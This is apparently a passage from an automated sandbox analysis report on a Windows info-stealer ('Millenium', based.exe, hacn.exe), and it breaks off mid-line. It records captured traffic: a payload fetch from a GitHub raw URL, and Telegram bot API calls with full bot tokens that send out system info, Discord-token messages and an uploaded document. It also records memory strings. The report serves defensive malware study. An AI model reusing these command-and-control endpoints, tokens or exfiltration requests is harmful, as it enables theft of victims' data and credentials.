05-Dec-2024 01:57:07 GMT; path=/; domain=.google.com; HttpOnlyData Raw: 1f 8b 08 00 00 00 00 00 02 ff cd 7c 79 7b db 36 b3 ef ff f9 14 34 7b 5e 45 7c 4c 4b a4 f6 c5 b4 af e3 38 4b 4f b6 c6 e9 f2 d6 f5 f5 01 49 48 62 cc cd 24 65 5b b1 f5 dd ef 6f 00 6e 92 95 b6 a7 e7 3e f7 b9 69 63 93 c0 00 98 0d 83 99 c1 30 87 7b 6e e4 64 ab 98 2b 8b 2c f0 8f 0e e9 a7 e2 65 3c 48 9d 28 e6 96 aa 8a 17 02 b0 d4 45 96 c5 93 76 3b 75 16 3c 60 ad 28 99 b7 7f e5 f6 27 36 e7 aa e2 b3 70 6e a9 3c 54 31 03 67 ee d1 61 c0 33 a6 38 51 98 f1 30 b3 d4 73 ce 12 67 a1 64 0b ae dc 45 89 ef 3e 4f 15 2f 9c 45 49 c0 32 2f 0a 75 bc 38 fe d2 f5 c2 b9 72 c7 ed 18 33 a6 68 0b e4 ef 5b cf e5 51 aa b0 d0 55 82 28 e1 2d e5 75 14 cd 7d e0 cb 52 25 60 e1 4a 49 Data Ascii: |y{64{^E|LK8KOIHb$e[on>ic0{nd+,e<H(Ev;u<`('6pn<T1ga38Q0sgdE>O/EI2/u8r3h[QU(-u}R%`JI
                                  Source: global trafficHTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590&text=%F0%9F%92%8EDiscord%20tokens:%0A HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590&text=%0A%F0%9F%96%A5Computer%20info:%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AComputer%20name:%20992547%0AUser%20name:%20user%0ASystem%20time:%202024-06-04%209:56:51%20pm%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20ON2Z3HY%0ARAM:%204095%20MB%0AHWID:%20E63B102745%0A%0A%F0%9F%9B%A1Security:%0AInstalled%20antivirus:%20Windows%20Defender.%0AStarted%20as%20admin:%20True HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590&text=%E2%9A%A1%EF%B8%8FBot%20connected:%0AUsername:%20user,%20Location:%20United%20States%20[US],%20Killeen,%20ID:%206476%0A%E2%84%B9%EF%B8%8FSend%20%22/6476*help%22%20to%20see%20the%20command%20list%0A%F0%9F%92%8EVersion:%202.8 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590&text=%E2%9A%A1%EF%B8%8FBot%20connected:%0AUsername:%20user,%20Location:%20United%20States%20[US],%20Killeen,%20ID:%205169%0A%E2%84%B9%EF%B8%8FSend%20%22/5169*help%22%20to%20see%20the%20command%20list%0A%F0%9F%92%8EVersion:%202.8 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.comUser-Agent: python-requests/2.28.1Accept-Encoding: gzip, deflate, brAccept: */*Connection: keep-alive
                                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.1
                                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.comUser-Agent: python-requests/2.28.1Accept-Encoding: gzip, deflate, brAccept: */*Connection: keep-alive
                                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.comUser-Agent: python-requests/2.28.1Accept-Encoding: gzip, deflate, brAccept: */*Connection: keep-alive
                                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                  Source: global trafficDNS traffic detected: DNS query: ip-api.com
                                  Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                                  Source: global trafficDNS traffic detected: DNS query: www.google.com
                                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                                  Source: unknownHTTP traffic detected: POST /bot7006262545:AAG_Oybxah5yJgAPFw9HTnZfJtepO5xBob8/sendDocument HTTP/1.1Host: api.telegram.orgAccept-Encoding: identityContent-Length: 3572User-Agent: python-urllib3/2.2.1Content-Type: multipart/form-data; boundary=0b4ba1c968e585ef344eda942b799b23
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: 75CC:35BBD2:52803C:5BA726:665FC5CCAccept-Ranges: bytesDate: Wed, 05 Jun 2024 01:56:29 GMTVia: 1.1 varnishX-Served-By: cache-dfw-kdfw8210032-DFWX-Cache: MISSX-Cache-Hits: 0X-Timer: S1717552590.719037,VS0,VE51Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *Cross-Origin-Resource-Policy: cross-originX-Fastly-Request-ID: 28047bd42688dd2b3620861dd56f3b38dfd0a8f4Expires: Wed, 05 Jun 2024 02:01:29 GMTSource-Age: 0
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: 75CC:35BBD2:52803C:5BA726:665FC5CCAccept-Ranges: bytesDate: Wed, 05 Jun 2024 01:56:43 GMTVia: 1.1 varnishX-Served-By: cache-dfw-kdfw8210154-DFWX-Cache: HITX-Cache-Hits: 1X-Timer: S1717552604.840955,VS0,VE1Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *Cross-Origin-Resource-Policy: cross-originX-Fastly-Request-ID: 4742bced582b85afb50d1846fe4da481dcf7d296Expires: Wed, 05 Jun 2024 02:01:43 GMTSource-Age: 14
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: 75CC:35BBD2:52803C:5BA726:665FC5CCAccept-Ranges: bytesDate: Wed, 05 Jun 2024 01:56:59 GMTVia: 1.1 varnishX-Served-By: cache-dfw-kdfw8210171-DFWX-Cache: HITX-Cache-Hits: 1X-Timer: S1717552620.528511,VS0,VE2Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *Cross-Origin-Resource-Policy: cross-originX-Fastly-Request-ID: 0d3e5cea8750e4a4fe24e92cb76efd93e7b15268Expires: Wed, 05 Jun 2024 02:01:59 GMTSource-Age: 30
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: 75CC:35BBD2:52803C:5BA726:665FC5CCAccept-Ranges: bytesDate: Wed, 05 Jun 2024 01:57:16 GMTVia: 1.1 varnishX-Served-By: cache-dfw-kdfw8210083-DFWX-Cache: HITX-Cache-Hits: 1X-Timer: S1717552637.562970,VS0,VE2Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *Cross-Origin-Resource-Policy: cross-originX-Fastly-Request-ID: db6fc59a4e8288af3e1783667487eed2b0b3d419Expires: Wed, 05 Jun 2024 02:02:16 GMTSource-Age: 47
                                  Source: based.exe, 00000007.00000003.1876198467.00000235B9F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi
                                  Source: based.exe, 00000007.00000003.1876198467.00000235B9F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digiCi
                                  Source: TS-240605-Millenium1.exe, 00000000.00000003.1833690751.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1878784619.00000235B9F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert
                                  Source: TS-240605-Millenium1.exe, 00000000.00000003.1833690751.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868701636.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1878784619.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000002.2150147759.00000235B9F7E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1923356570.000002C3F582D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.co
                                  Source: based.exe, 00000007.00000003.1878784619.00000235B9F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.coCi
                                  Source: hacn.exe, 00000006.00000003.1868701636.0000024C988B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.coR
                                  Source: TS-240605-Millenium1.exe, 00000000.00000003.1833690751.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1833414858.000001C002F5F000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830279591.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1829896804.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1833414858.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1831955754.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1832583214.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830776920.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1829490121.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830531474.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1871745230.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868701636.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1870307360.0000024C988C2000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1880772946.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1867122240.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1881211961.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868238836.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1870307360.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868965314.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1869235010.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1868737646.00000235B9F82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                  Source: TS-240605-Millenium1.exe, 00000000.00000003.1833690751.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830279591.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1829896804.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1833414858.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1831955754.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1832583214.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830776920.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1829490121.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830531474.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1871745230.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868701636.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1870307360.0000024C988C2000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1880772946.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1867122240.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1881211961.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868238836.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1870307360.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 